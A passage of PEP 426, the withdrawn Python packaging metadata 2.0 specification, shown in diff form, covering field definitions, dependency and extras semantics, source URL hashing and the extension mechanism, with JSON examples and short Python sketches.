Some of the ideas in this PEP (or the related PEP 459) may still be considered +as part of later proposals, but they will be handled in a more incremental +fashion, rather than as a single large proposed change with no feasible +migration plan.

+

+
+
+

Abstract

+

This PEP describes a mechanism for publishing and exchanging metadata +related to Python distributions. It includes specifics of the field names, +and their semantics and usage.

+

This document specifies the never released version 2.0 of the metadata format.

+

Version 1.0 is specified in PEP 241. +Version 1.1 is specified in PEP 314. +Version 1.2 is specified in PEP 345.

+

Version 2.0 of the metadata format proposed migrating from directly defining a +custom key-value file format to instead defining a JSON-compatible in-memory +representation that may be used to define metadata representation in other +contexts (such as API and archive format definitions).

+

This version also defines a formal extension mechanism, allowing new +fields to be added for particular purposes without requiring updates to +the core metadata format.

+
+
+

Note on PEP History

+

This PEP was initially deferred for an extended period, from December 2013 +through to March 2017, as distutils-sig worked through a number of other +changes. These changes included:

+
    +
  • defining a binary compatibility tagging format in PEP 425
  • +
  • defining a binary archive format (wheel) in PEP 427
  • +
  • explicitly defining versioning and version comparison in PEP 440
  • +
  • explicitly defining the PyPI “simple” API in PEP 503
  • +
  • explicitly defining dependency specifiers and the extras system in PEP 508
  • +
  • declaring static build system dependencies (pyproject.toml) in PEP 518
  • +
  • migrating PyPI hosting to Rackspace, and placing it behind the Fastly CDN
  • +
  • shipping pip with CPython by default in PEP 453, and backporting that +addition to Python 2.7 in PEP 477
  • +
  • establishing packaging.python.org as the common access point for Python +packaging ecosystem documentation
  • +
  • migrating to using the specifications section of packaging.python.org +as the central location for tracking packaging related PEPs
  • +
+

The time spent pursuing these changes provided additional perspective on which +metadata format changes were genuinely desirable, and which could be omitted +from the revised specification as merely being “change for change’s sake”.

+

It also allowed a number of features that aren’t critical to the core activity +of publishing and distributing software to be moved out to PEP 459, a separate +proposal for a number of standard metadata extensions that provide additional +optional information about a release.

+

As of September 2017, it was deferred again, on the grounds that +it doesn’t actually help solve any particularly pressing problems:

+
    +
  • JSON representation would be better handled through defining a +transformation of the existing metadata 1.2 fields
  • +
  • clarification of the additional fields defined in the past few +years and related changes to the spec management process would +be better covered in a minor spec version update
  • +
+

Finally, the PEP was withdrawn in February 2018 in favour of PEP 566 (which +pursues that more incremental strategy).

+
+
+

Purpose

+

The purpose of this PEP is to define a common metadata interchange format +for communication between software publication tools and software integration +tools in the Python ecosystem. One key aim is to support full dependency +analysis in that ecosystem without requiring the execution of arbitrary +Python code by those doing the analysis. Another aim is to encourage good +software distribution practices by default, while continuing to support the +current practices of almost all existing users of the Python Package Index +(both publishers and integrators). Finally, the aim is to support an upgrade +path from the currently in use metadata formats that is transparent to end +users.

+

The design draws on the Python community’s nearly 20 years of experience with +distutils based software distribution, and incorporates ideas and concepts +from other distribution systems, including Python’s setuptools, pip and +other projects, Ruby’s gems, Perl’s CPAN, Node.js’s npm, PHP’s composer +and Linux packaging systems such as RPM and APT.

+

While the specifics of this format are aimed at the Python ecosystem, some +of the ideas may also be useful in the future evolution of other dependency +management ecosystems.

+
+
+

Development, Distribution and Deployment of Python Software

+

The metadata design in this PEP is based on a particular conceptual model +of the software development and distribution process. This model consists of +the following phases:

+
    +
  • Software development: this phase involves working with a source checkout +for a particular application to add features and fix bugs. It is +expected that developers in this phase will need to be able to build the +software, run the software’s automated test suite, run project specific +utility scripts and publish the software.
  • +
  • Software publication: this phase involves taking the developed software +and making it available for use by software integrators. This includes +creating the descriptive metadata defined in this PEP, as well as making +the software available (typically by uploading it to an index server).
  • +
  • Software integration: this phase involves taking published software +components and combining them into a coherent, integrated system. This +may be done directly using Python specific cross-platform tools, or it may +be handled through conversion to development language neutral platform +specific packaging systems.
  • +
  • Software deployment: this phase involves taking integrated software +components and deploying them on to the target system where the software +will actually execute.
  • +
+

The publication and integration phases are collectively referred to as +the distribution phase, and the individual software components distributed +in that phase are formally referred to as “distribution packages”, but are more +colloquially known as just “packages” (relying on context to disambiguate them +from the “module with submodules” kind of Python package).

+

The exact details of these phases will vary greatly for particular use cases. +Deploying a web application to a public Platform-as-a-Service provider, +publishing a new release of a web framework or scientific library, +creating an integrated Linux distribution, or upgrading a custom application +running in a secure enclave are all situations this metadata design should +be able to handle.

+

The complexity of the metadata described in this PEP thus arises directly +from the actual complexities associated with software development, +distribution and deployment in a wide range of scenarios.

+
+

Supporting definitions

+

The key words “MUST”, “MUST NOT”, “REQUIRED”, “SHALL”, “SHALL NOT”, +“SHOULD”, “SHOULD NOT”, “RECOMMENDED”, “MAY”, and “OPTIONAL” in this +document are to be interpreted as described in RFC 2119.

+

“Projects” are software components that are made available for integration. +Projects include Python libraries, frameworks, scripts, plugins, +applications, collections of data or other resources, and various +combinations thereof. Public Python projects are typically registered on +the Python Package Index.

+

“Releases” are uniquely identified snapshots of a project.

+

“Distribution packages” are the packaged files which are used to publish +and distribute a release.

+

Depending on context, “package” may refer to either a distribution, or +to an importable Python module that has a __path__ attribute and hence +may also have importable submodules.

+

“Source archive” and “VCS checkout” both refer to the raw source code for +a release, prior to creation of an sdist or binary archive.

+

An “sdist” is a publication format providing the distribution metadata and +any source files that are essential to creating a binary archive for +the distribution. Creating a binary archive from an sdist requires that +the appropriate build tools be available on the system.

+

“Binary archives” only require that prebuilt files be moved to the correct +location on the target system. As Python is a dynamically bound +cross-platform language, many so-called “binary” archives will contain only +pure Python source code.

+

“Contributors” are individuals and organizations that work together to +develop a software component.

+

“Publishers” are individuals and organizations that make software components +available for integration (typically by uploading distributions to an +index server)

+

“Integrators” are individuals and organizations that incorporate published +distributions as components of an application or larger system.

+

“Build tools” are automated tools intended to run on development systems, +producing source and binary distribution archives. Build tools may also be +invoked by integration tools in order to build software distributed as +sdists rather than prebuilt binary archives.

+

“Index servers” are active distribution registries which publish version and +dependency metadata and place constraints on the permitted metadata.

+

“Public index servers” are index servers which allow distribution uploads +from untrusted third parties. The Python Package Index is a public index +server.

+

“Publication tools” are automated tools intended to run on development +systems and upload source and binary distribution archives to index servers.

+

“Integration tools” are automated tools that consume the metadata and +distribution archives published by an index server or other designated +source, and make use of them in some fashion, such as installing them or +converting them to a platform specific packaging format.

+

“Installation tools” are integration tools specifically intended to run on +deployment targets, consuming source and binary distribution archives from +an index server or other designated location and deploying them to the target +system.

+

“Automated tools” is a collective term covering build tools, index servers, +publication tools, integration tools and any other software that produces +or consumes distribution version and dependency metadata.

+

“Legacy metadata” refers to earlier versions of this metadata specification, +along with the supporting metadata file formats defined by the +setuptools project.

+

“Distro” is used as the preferred term for Linux distributions, to help +avoid confusion with the Python-specific use of the term “distribution +package”.

+

“Qualified name” is a dotted Python identifier. For imported modules and +packages, the qualified name is available as the __name__ attribute, +while for functions and classes it is available as the __qualname__ +attribute.

+

A “fully qualified name” uniquely locates an object in the Python module +namespace. For imported modules and packages, it is the same as the +qualified name. For other Python objects, the fully qualified name consists +of the qualified name of the containing module or package, a colon (:) +and the qualified name of the object relative to the containing module or +package.

+

A “prefixed name” starts with a qualified name, but is not necessarily a +qualified name - it may contain additional dot separated segments which are +not valid identifiers.

+
+
+

Integration and deployment of distributions

+

The primary purpose of the distribution metadata is to support integration +and deployment of distributions as part of larger applications and systems.

+

Integration and deployment can in turn be broken down into further substeps.

+
    +
  • Build: the build step is the process of turning a VCS checkout, source +archive or sdist into a binary archive. Dependencies must be available +in order to build and create a binary archive of the distribution +(including any documentation that is installed on target systems).
  • +
  • Installation: the installation step involves getting the distribution +and all of its runtime dependencies onto the target system. In this +step, the distribution may already be on the system (when upgrading or +reinstalling) or else it may be a completely new installation.
  • +
  • Runtime: this is normal usage of a distribution after it has been +installed on the target system.
  • +
+

These three steps may all occur directly on the target system. Alternatively +the build step may be separated out by using binary archives provided by the +publisher of the distribution, or by creating the binary archives on a +separate system prior to deployment. The advantage of the latter approach +is that it minimizes the dependencies that need to be installed on +deployment targets (as the build dependencies will be needed only on the +build systems).

+

The published metadata for distribution packages SHOULD allow integrators, with +the aid of build and integration tools, to:

+
    +
  • obtain the original source code that was used to create a distribution
  • +
  • identify and retrieve the dependencies (if any) required to use a +distribution
  • +
  • identify and retrieve the dependencies (if any) required to build a +distribution from source
  • +
  • identify and retrieve the dependencies (if any) required to run a +distribution’s test suite
  • +
+
+
+

Development and publication of distributions

+

The secondary purpose of the distribution metadata is to support effective +collaboration amongst software contributors and publishers during the +development phase.

+

The published metadata for distributions SHOULD allow contributors +and publishers, with the aid of build and publication tools, to:

+
    +
  • perform all the same activities needed to effectively integrate and +deploy the distribution
  • +
  • identify and retrieve the additional dependencies needed to develop and +publish the distribution
  • +
  • specify the dependencies (if any) required to use the distribution
  • +
  • specify the dependencies (if any) required to build the distribution +from source
  • +
  • specify the dependencies (if any) required to run the distribution’s +test suite
  • +
  • specify the additional dependencies (if any) required to develop and +publish the distribution
  • +
+
+
+
+

Metadata format

+

The format defined in this PEP is an in-memory representation of Python +distribution metadata as a string-keyed dictionary. Permitted values for +individual entries are strings, lists of strings, and additional +nested string-keyed dictionaries.

+

Except where otherwise noted, dictionary keys in distribution metadata MUST +be valid Python identifiers in order to support attribute based metadata +access APIs.

+

The individual field descriptions show examples of the key name and value +as they would be serialised as part of a JSON mapping.

+

Unless otherwise indicated, the fields identified as core metadata are required. +Automated tools MUST NOT accept distributions with missing core metadata as +valid Python distributions.

+

All other fields are optional. Automated tools MUST operate correctly +if a distribution does not provide them, except for those operations +which specifically require the omitted fields.

+

Automated tools MUST NOT insert dummy data for missing fields. If a valid +value is not provided for a required field then the metadata and the +associated distribution MUST be rejected as invalid. If a valid value +is not provided for an optional field, that field MUST be omitted entirely. +Automated tools MAY automatically derive valid values from other +information sources (such as a version control system).

+

Automated tools, especially public index servers, MAY impose additional +length restrictions on metadata beyond those enumerated in this PEP. Such +limits SHOULD be imposed where necessary to protect the integrity of a +service, based on the available resources and the service provider’s +judgment of reasonable metadata capacity requirements.

+
+

Metadata files

+

The information defined in this PEP is serialised to pysdist.json +files for some use cases. These are files containing UTF-8 encoded JSON +metadata.

+

Each metadata file consists of a single serialised mapping, with fields as +described in this PEP. When serialising metadata, automated tools SHOULD +lexically sort any keys and list elements in order to simplify reviews +of any changes.

+

There are expected to be three standard locations for these metadata files:

+
    +
  • as a {distribution}-{version}.dist-info/pysdist.json file in an +sdist source distribution archive
  • +
  • as a {distribution}-{version}.dist-info/pysdist.json file in a wheel +binary distribution archive
  • +
  • as a {distribution}-{version}.dist-info/pysdist.json file in a local +Python installation database
  • +
+

This file is expected to be identical in all three locations - it is +generated when creating a source archive or binary archive from a source +tree, and then preserved unchanged on installation, or when building a +binary archive from a source archive.

+
+

Note

+

These locations are to be confirmed, since they depend on the definition +of sdist 2.0 and the revised installation database standard. There will +also be a wheel 1.1 format update after this PEP is approved that +mandates provision of 2.0+ metadata.

+
+

Note that these metadata files MAY be processed even if the version of the +containing location is too low to indicate that they are valid. Specifically, +unversioned sdist archives, unversioned installation database directories +and version 1.0 of the wheel specification may still provide +pysdist.json files.

+
+

Note

+

Until this specification is formally marked as Active, it is recommended +that tools following the draft format use an alternative filename like +metadata.json or pep426-20131213.json to avoid colliding with +the eventually standardised files.

+
+

Other tools involved in Python distribution MAY also use this format.

+

Note that these metadata files are generated by build tools based on other +input formats (such as setup.py and pyproject.toml) rather than being +used directly as a data input format. Generating the metadata as part of the +publication process also helps to deal with version specific fields (including +the source URL and the version field itself).

+

For backwards compatibility with older installation tools, metadata 2.0 +files MAY be distributed alongside legacy metadata.

+

Index servers MAY allow distributions to be uploaded and installation tools +MAY allow distributions to be installed with only legacy metadata.

+

Automated tools MAY attempt to automatically translate legacy metadata to +the format described in this PEP. Advice for doing so effectively is given +in Appendix A.

+
+
+

Metadata validation

+

A jsonschema description of +the distribution metadata is available.

+

This schema does NOT currently handle validation of some of the more complex +string fields (instead treating them as opaque strings).

+

Except where otherwise noted, all URL fields in the metadata MUST comply +with RFC 3986.

+
+

Note

+

The current version of the schema file covers the previous draft of the +PEP, and has not yet been updated for the split into the essential +dependency resolution metadata and multiple standard extensions, and nor +has it been updated for the various other differences between the current +draft and the earlier drafts.

+
+
+
+
+

Core metadata

+

This section specifies the core metadata fields that are required for every +Python distribution.

+

Publication tools MUST ensure at least these fields are present when +publishing a distribution.

+

Index servers MUST ensure at least these fields are present in the metadata +when distributions are uploaded.

+

Installation tools MUST refuse to install distributions with one or more +of these fields missing by default, but MAY allow users to force such an +installation to occur.

+
+

Metadata version

+

Version of the file format; "2.0" is the only legal value.

+

Automated tools consuming metadata SHOULD warn if metadata_version is +greater than the highest version they support, and MUST fail if +metadata_version has a greater major version than the highest +version they support (as described in PEP 440, the major version is the +value before the first dot).

+

For broader compatibility, build tools MAY choose to produce +distribution metadata using the lowest metadata version that includes +all of the needed fields.

+

Example:

+
"metadata_version": "2.0"
+
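+
A sketch of the consumer-side check described above (the helper name is invented; versions are compared numerically, with the major version first):
+
import warnings
+
+def check_metadata_version(declared, supported="2.0"):
+    declared_parts = tuple(int(part) for part in declared.split("."))
+    supported_parts = tuple(int(part) for part in supported.split("."))
+    if declared_parts[0] > supported_parts[0]:
+        # Newer major version: MUST fail
+        raise ValueError("cannot process metadata_version %r" % (declared,))
+    if declared_parts > supported_parts:
+        # Newer minor version: SHOULD warn, but may proceed
+        warnings.warn("metadata_version %r is newer than %r" % (declared, supported))
+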
+
+
+
+

Generator

+

Name (and optional version) of the program that generated the file, +if any. A manually produced file would omit this field.

+

Examples:

+
"generator": "flit"
+"generator": "setuptools (34.3.1)"
+
+
+
+
+

Name

+

The name of the distribution, as defined in PEP 508.

+

As distribution names are used as part of URLs, filenames, command line +parameters and must also interoperate with other packaging systems, the +permitted characters are constrained to:

+
    +
  • ASCII letters ([a-zA-Z])
  • +
  • ASCII digits ([0-9])
  • +
  • underscores (_)
  • +
  • hyphens (-)
  • +
  • periods (.)
  • +
+

Distribution names MUST start and end with an ASCII letter or digit.

+

Automated tools MUST reject non-compliant names. A regular expression to +enforce these constraints (when run with re.IGNORECASE) is:

+
^([A-Z0-9]|[A-Z0-9][A-Z0-9._-]*[A-Z0-9])$
+
+
+

All comparisons of distribution names MUST be case insensitive, and MUST +consider hyphens and underscores to be equivalent.

+
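+
A sketch combining the validation regex with those comparison rules (helper names invented):
+
import re
+
+_NAME_RE = re.compile(r"^([A-Z0-9]|[A-Z0-9][A-Z0-9._-]*[A-Z0-9])$", re.IGNORECASE)
+
+def is_valid_name(name):
+    return _NAME_RE.match(name) is not None
+
+def names_equal(a, b):
+    # Case insensitive, with hyphens and underscores treated as equivalent
+    fold = lambda name: name.lower().replace("-", "_")
+    return fold(a) == fold(b)
+
+assert is_valid_name("ComfyChair")
+assert names_equal("Comfy-Chair", "comfy_chair")
+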

Index servers MAY consider “confusable” characters (as defined by the +Unicode Consortium in TR39: Unicode Security Mechanisms) to be +equivalent.

+

Index servers that permit arbitrary distribution name registrations from +untrusted sources SHOULD consider confusable characters to be equivalent +when registering new distributions (and hence reject them as duplicates).

+

Integration tools MUST NOT silently accept a confusable alternate +spelling as matching a requested distribution name.

+

At time of writing, the characters in the ASCII subset designated as +confusables by the Unicode Consortium are:

+
    +
  • 1 (DIGIT ONE), l (LATIN SMALL LETTER L), and I (LATIN CAPITAL +LETTER I)
  • +
  • 0 (DIGIT ZERO), and O (LATIN CAPITAL LETTER O)
  • +
+

Example:

+
"name": "ComfyChair"
+
+
+
+
+

Version

+

The distribution’s public or local version identifier, as defined in PEP 440. +Version identifiers are designed for consumption by automated tools and +support a variety of flexible version specification mechanisms (see PEP 440 +for details).

+

Version identifiers MUST comply with the format defined in PEP 440.

+

Version identifiers MUST be unique within each project.

+

Index servers MAY place restrictions on the use of local version identifiers +as described in PEP 440.

+

Example:

+
"version": "1.0a2"
+
+
+
+
+

Summary

+

A short summary of what the distribution does.

+

This field SHOULD contain fewer than 512 characters and MUST contain fewer +than 2048.

+

This field SHOULD NOT contain any line breaks.

+

A more complete description SHOULD be included as a separate file in the +sdist for the distribution. Refer to the python-details extension in +PEP 459 for more information.

+

Example:

+
"summary": "A module that is more fiendish than soft cushions."
+
+
+
+
+
+

Source code metadata

+

This section specifies fields that provide identifying details for the +source code used to produce this distribution.

+

All of these fields are optional. Automated tools MUST operate correctly if +a distribution does not provide them, including failing cleanly when an +operation depending on one of these fields is requested.

+
+

Source labels

+

Source labels are text strings with minimal defined semantics. They are +intended to allow the original source code to be unambiguously identified, +even if an integrator has applied additional local modifications to a +particular distribution.

+

To ensure source labels can be readily incorporated as part of file names and URLs, and to avoid formatting inconsistencies in hexadecimal hash representations, they MUST be limited to the following set of permitted characters:

+
    +
  • Lowercase ASCII letters ([a-z])
  • +
  • ASCII digits ([0-9])
  • +
  • underscores (_)
  • +
  • hyphens (-)
  • +
  • periods (.)
  • +
  • plus signs (+)
  • +
+

Source labels MUST start and end with an ASCII letter or digit.

+

A regular expression to enforce these constraints (when run with re.IGNORECASE) is:

+
^([A-Z0-9]|[A-Z0-9][A-Z0-9._+-]*[A-Z0-9])$
+
+
+

A source label for a project MUST NOT match any defined version for that +project. This restriction ensures that there is no ambiguity between version +identifiers and source labels.

+

Examples:

+
"source_label": "1.0.0-alpha.1"
+
+"source_label": "1.3.7+build.11.e0f985a"
+
+"source_label": "v1.8.1.301.ga0df26f"
+
+"source_label": "2013.02.17.dev123"
+
+
+
+
+

Source URL

+

A string containing a full URL where the source for this specific version of +the distribution can be downloaded.

+

Source URLs MUST be unique within each project. This means that the URL +can’t be something like "https://github.com/pypa/pip/archive/main.zip", +but instead must be "https://github.com/pypa/pip/archive/1.3.1.zip".

+

The source URL MUST reference either a source archive or a tag or specific +commit in an online version control system that permits creation of a +suitable VCS checkout. It is intended primarily for integrators that +wish to recreate the distribution from the original source form.

+

All source URL references SHOULD specify a secure transport mechanism +(such as https) AND include an expected hash value in the URL for +verification purposes. If a source URL is specified without any hash +information, with hash information that the tool doesn’t understand, or +with a selected hash algorithm that the tool considers too weak to trust, +automated tools SHOULD at least emit a warning and MAY refuse to rely on +the URL. If such a source URL also uses an insecure transport, automated +tools SHOULD NOT rely on the URL.

+

For source archive references, an expected hash value may be specified by +including a <hash-algorithm>=<expected-hash> entry as part of the URL +fragment.

+

As of 2017, it is RECOMMENDED that 'sha256' hashes be used for source +URLs, as this hash is not yet known to be vulnerable to generation of +malicious collisions, while also being widely available on client systems.

+
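+
A sketch of verifying downloaded bytes against such a fragment (the helper name is invented; a real tool would also check transport security and hash strength, as described above):
+
import hashlib
+import urllib.parse
+
+def verify_source_url(url, payload):
+    # The URL fragment carries "<hash-algorithm>=<expected-hash>"
+    fragment = urllib.parse.urlsplit(url).fragment
+    algorithm, _, expected = fragment.partition("=")
+    if not expected:
+        raise ValueError("no hash information in URL: %r" % (url,))
+    actual = hashlib.new(algorithm, payload).hexdigest()  # ValueError if unknown
+    if actual != expected:
+        raise ValueError("hash mismatch for %r" % (url,))
+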

For version control references, the VCS+protocol scheme SHOULD be +used to identify both the version control system and the secure transport, +and a version control system with hash based commit identifiers SHOULD be +used. Automated tools MAY omit warnings about missing hashes for version +control systems that do not provide hash based commit identifiers.

+

To handle version control systems that do not support including commit or +tag references directly in the URL, that information may be appended to the +end of the URL using the @<commit-hash> or the @<tag>#<commit-hash> +notation.

+
+

Note

+

This isn’t quite the same as the existing VCS reference notation +supported by pip. Firstly, the distribution name is a separate field rather +than embedded as part of the URL. Secondly, the commit hash is included +even when retrieving based on a tag, in order to meet the requirement +above that every link should include a hash to make things harder to +forge (creating a malicious repo with a particular tag is easy, creating +one with a specific hash, less so).

+
+

Example:

+
"source_url": "https://github.com/pypa/pip/archive/1.3.1.zip#sha256=2dc6b5a470a1bde68946f263f1af1515a2574a150a30d6ce02c6ff742fcc0db8
+"source_url": "git+https://github.com/pypa/pip.git@1.3.1#7921be1537eac1e97bc40179a57f0349c2aee67d"
+"source_url": "git+https://github.com/pypa/pip.git@7921be1537eac1e97bc40179a57f0349c2aee67d"
+
+
+
+
+
+

Semantic dependencies

+

Dependency metadata allows published projects to make use of functionality +provided by other published projects, without needing to bundle copies of +particular releases of those projects.

+

Semantic dependencies allow publishers to indicate not only which other +projects are needed, but also why they’re needed. This additional +information allows integrators to install just the dependencies they need +for specific activities, making it easier to minimise installation +footprints in constrained environments (regardless of the reasons for +those constraints).

+

By default, dependency declarations are assumed to be for +“runtime dependencies”: other releases that are needed to actually use the +published release.

+

There are also four different kinds of optional dependency that releases may +declare:

+
    +
  • test dependencies: other releases that are needed to run the +automated test suite for this release, but are not needed just to +use it (e.g. nose2 or pytest)
  • +
  • build dependencies: other releases that are needed to build a deployable binary version of this release from source (e.g. flit or setuptools)
  • +
  • doc dependencies: other releases that are needed to build the +documentation for this distribution (e.g. the sphinx build tool)
  • +
  • dev dependencies: other releases that are needed when working on this +distribution, but do not fit into exactly one of the other optional +dependency categories (e.g. pylint, flake8). dev dependencies +are also effectively considered as combined test, build, and doc +dependencies, without needing to be listed three times
  • +
+

These optional categories are known as +Extras. In addition to the four +standard categories, projects may also declare their own custom categories +in the Extras field.

+

There are also two standard extra categories that imply dependencies on +other extras:

+
    +
  • alldev: implies the test, build, doc, dev extras
  • +
  • all: if not otherwise defined, implies all declared extras
  • +
+

Dependency management is heavily dependent on the version identification +and specification scheme defined in PEP 440 and the dependency specification, +extra, and environment marker schemes defined in PEP 508.

+

All of these fields are optional. Automated tools MUST operate correctly if +a distribution does not provide them, by assuming that a missing field +indicates “Not applicable for this distribution”.

+
+

Mapping dependencies to development and distribution activities

+

The different categories of dependency are based on the various distribution +and development activities identified above, and govern which dependencies +should be installed for the specified activities:

+
    +
  • Required runtime dependencies:
      +
    • unconditional dependencies
    • +
    +
  • +
  • Required build dependencies:
      +
    • the build extra
    • +
    • the dev extra
    • +
    • If running the distribution’s test suite as part of the build process, +also install the unconditional dependencies and test extra
    • +
    +
  • +
  • Required development and publication dependencies:
      +
    • unconditional dependencies
    • +
    • the test extra
    • +
    • the build extra
    • +
    • the doc extra
    • +
    • the dev extra
    • +
    +
  • +
+

The notation described in Extras (optional dependencies) SHOULD be used +to determine exactly what gets installed for various operations.

+

Installation tools SHOULD report an error if dependencies cannot be +satisfied, MUST at least emit a warning, and MAY allow the user to force +the installation to proceed regardless.

+

See Appendix B for an overview of mapping these dependencies to an RPM +spec file.

+
+
+

Extras

+

A list of optional sets of dependencies that may be used to define +conditional dependencies in dependency fields. See +Extras (optional dependencies) for details.

+

The names of extras MUST abide by the same restrictions as those for +distribution names.

+

The following extra names are available by default and MUST NOT be +declared explicitly in this field:

+
    +
  • all
  • +
  • alldev
  • +
  • build
  • +
  • dev
  • +
  • doc
  • +
  • test
  • +
+

Example:

+
"extras": ["warmup", "tea"]
+
+
+
+
+

Dependencies

+

A list of release requirements needed to actually run this release.

+

Public index servers MAY prohibit strict version matching clauses or direct +references in this field.

+

Example:

+
"dependencies":
+  {
+    "requires": ["SciPy", "PasteDeploy", "zope.interface > 3.5.0"]
+  },
+  {
+    "requires": ["pywin32 > 1.0"],
+    "environment": "sys_platform == 'win32'"
+  },
+  {
+    "requires": ["SoftCushions"],
+    "extra": "warmup"
+  }
+]
+
+
+

While many dependencies will be needed to use a project release at all, others +are needed only on particular platforms or only when particular optional +features of the release are needed.

+

To handle this, release dependency specifiers are mappings with the following +subfields:

+
    +
  • requires: a list of requirements needed to satisfy the dependency
  • +
  • extra: the name of a set of optional dependencies that are requested +and installed together. See Extras (optional dependencies) for details
  • +
  • environment: an environment marker defining the environment that +needs these dependencies. The syntax and capabilities of environment +markers are defined in PEP 508
  • +
+

Individual entries in the requires lists are strings using the dependency +declaration format defined in PEP 508, with the exception that environment +markers MUST NOT be included in the individual dependency declarations, and +are instead supplied in the separate environment field.

+

requires is the only required subfield. When it is the only subfield, the +dependencies are said to be unconditional. If extra or environment +is specified, then the dependencies are conditional.

+

All three fields may be supplied, indicating that the dependencies are +needed only when the named extra is requested in a particular environment.

+
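+
A sketch of evaluating these specifiers when computing an install set (the helper name is invented; evaluating PEP 508 environment markers is delegated to a caller-supplied predicate):
+
def collect_requires(dependencies, extras=frozenset(), marker_matches=lambda m: True):
+    requires = []
+    for dep in dependencies:
+        if "extra" in dep and dep["extra"] not in extras:
+            continue  # conditional on an extra that was not requested
+        if "environment" in dep and not marker_matches(dep["environment"]):
+            continue  # conditional on a non-matching environment marker
+        requires.extend(dep["requires"])
+    return requires
+
With the example above, collect_requires(deps) yields just the unconditional requirements, while collect_requires(deps, extras={"warmup"}) also includes "SoftCushions".
+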

Automated tools MUST combine related dependency specifiers (those with +common values for extra and environment) into a single specifier +listing multiple requirements when serialising metadata.

+

Despite this required normalisation, the same extra name or environment +marker MAY appear in multiple conditional dependencies. This may happen, +for example, if an extra itself only needs some of its dependencies in +specific environments. It is only the combination of extras and environment +markers that is required to be unique in a list of dependency specifiers.

+

Aside from the six standard extra categories, any extras referenced from a +dependency specifier MUST be named in the Extras field for this distribution. +This helps avoid typographical errors and also makes it straightforward to +identify the available extras without scanning the full set of dependencies.

+

To reuse an extra definition as part of another extra, project releases MAY +declare dependencies on themselves. To avoid infinite recursion in these cases, +automated tools MUST special case dependencies from a project back onto itself.

+
+
+
+

Metadata Extensions

+

Extensions to the metadata MAY be present in a mapping under the +extensions key. The keys MUST be valid prefixed names, while +the values MUST themselves be nested mappings.

+

Two key names are reserved and MUST NOT be used by extensions, except as +described below:

+
    +
  • extension_version
  • +
  • installer_must_handle
  • +
+

The following example shows the python.details and python.commands +standard extensions from PEP 459:

+
"extensions" : {
+  "python.details": {
+    "license": "GPL version 3, excluding DRM provisions",
+    "keywords": [
+      "comfy", "chair", "cushions", "too silly", "monty python"
+    ],
+    "classifiers": [
+      "Development Status :: 4 - Beta",
+      "Environment :: Console (Text Based)",
+      "License :: OSI Approved :: GNU General Public License v3 (GPLv3)"
+    ],
+    "document_names": {
+        "description": "README.rst",
+        "license": "LICENSE.rst",
+        "changelog": "NEWS"
+    }
+  },
+  "python.commands": {
+    "wrap_console": [{"chair": "chair:run_cli"}],
+    "wrap_gui": [{"chair-gui": "chair:run_gui"}],
+    "prebuilt": ["reduniforms"]
+  }
+}
+
+
+

Extension names are defined by distributions that will then make use of +the additional published metadata in some way.

+

To reduce the chance of name conflicts, extension names SHOULD use a +prefix that corresponds to a module name in the distribution that defines +the meaning of the extension. This practice will also make it easier to +find authoritative documentation for metadata extensions.

+

Metadata extensions allow development tools to record information in the +metadata that may be useful during later phases of distribution, but is +not essential for dependency resolution or building the software.

+
+

Extension versioning

+

Extensions MUST be versioned, using the extension_version key. +However, if this key is omitted, then the implied version is 1.0.

+

Automated tools consuming extension metadata SHOULD warn if +extension_version is greater than the highest version they support, +and MUST fail if extension_version has a greater major version than +the highest version they support (as described in PEP 440, the major +version is the value before the first dot).

+

For broader compatibility, build tools MAY choose to produce extension metadata using the lowest extension version that includes all of the needed fields.

+
+
+

Required extension handling

+

A project may consider correct handling of some extensions to be essential +to correct installation of the software. This is indicated by setting the +installer_must_handle field to true. Setting it to false or +omitting it altogether indicates that processing the extension when +installing the distribution is not considered mandatory by the developers.

+

Installation tools MUST fail if installer_must_handle is set to true +for an extension and the tool does not have any ability to process that +particular extension (whether directly or through a tool-specific plugin +system).

+

If an installation tool encounters a required extension it doesn’t +understand when attempting to install from a wheel archive, it MAY fall +back on attempting to install from source rather than failing entirely.

+
+
+
+

Extras (optional dependencies)

+

As defined in PEP 508, extras are additional dependencies that enable an optional aspect of a project release, often corresponding to a try: import optional_dependency ... block in the code. They are also used to indicate semantic dependencies for activities other than normal runtime use (such as testing, building, or working on the component).

+

To support the use of the release with or without the optional dependencies, +they are listed separately from the release’s core runtime dependencies +and must be requested explicitly, either in the dependency specifications of +another project, or else when issuing a command to an installation tool.

+

Example of a distribution with optional dependencies:

+
"name": "ComfyChair",
+"extras": ["warmup"]
+"dependencies": [
+  {
+    "requires": ["SoftCushions"],
+    "extra": "warmup"
+  },
+  {
+    "requires": ["cython"],
+    "extra": "build"
+  }
+]
+
+
+

Other distributions require the additional dependencies by placing the relevant extra names inside square brackets after the distribution name when specifying the dependency. Multiple extras from a dependency can be requested by placing them inside the square brackets as a comma-separated list (e.g. ComfyChair[warmup,tea]).

+

If the standard all extra has no explicitly declared entries, then +integration tools SHOULD implicitly define it as a dependency on all of the +extras explicitly declared by the project.

+

If the standard alldev extra has no explicitly declared entries, then +integration tools SHOULD implicitly define it as a dependency on the standard +test, build, doc, and dev extras.

+
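+
A sketch of expanding those implied categories (a simplification that treats them as name expansion; the helper name is invented):
+
def effective_extras(requested, declared):
+    expanded = set()
+    for extra in requested:
+        if extra == "all":
+            expanded.update(declared)  # all explicitly declared extras
+        elif extra == "alldev":
+            expanded.update({"test", "build", "doc", "dev"})
+        else:
+            expanded.add(extra)
+    return expanded
+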

The full set of dependency requirements is then based on the unconditional +dependencies, along with those of any requested extras.

+

Dependency examples (showing just the requires subfield):

+
"requires": ["ComfyChair"]
+    -> requires ``ComfyChair`` only
+
+"requires": ["ComfyChair[warmup]"]
+    -> requires ``ComfyChair`` and ``SoftCushions``
+
+"requires": ["ComfyChair[all]"]
+    -> requires ``ComfyChair`` and ``SoftCushions``, but will also
+       pick up any new extras defined in later versions
+
+
+
+
+

Updating the metadata specification

+

The metadata specification may be updated with clarifications without +requiring a new PEP or a change to the metadata version.

+

Changing the meaning of existing fields or adding new features (other than +through the extension mechanism) requires a new metadata version defined in +a new PEP.

+
+
+

Appendix A: Conversion notes for legacy metadata

+

The reference implementations for converting from legacy metadata to +metadata 2.0 are:

+
  • the wheel project, which adds the bdist_wheel command to setuptools
  • the Warehouse project, which will eventually be migrated to the Python Packaging Authority as the next generation Python Package Index implementation
  • the distlib project, which is derived from the core packaging infrastructure created for the distutils2 project
+

Note

+

These tools have yet to be updated for the switch to standard extensions +for several fields.

+
+

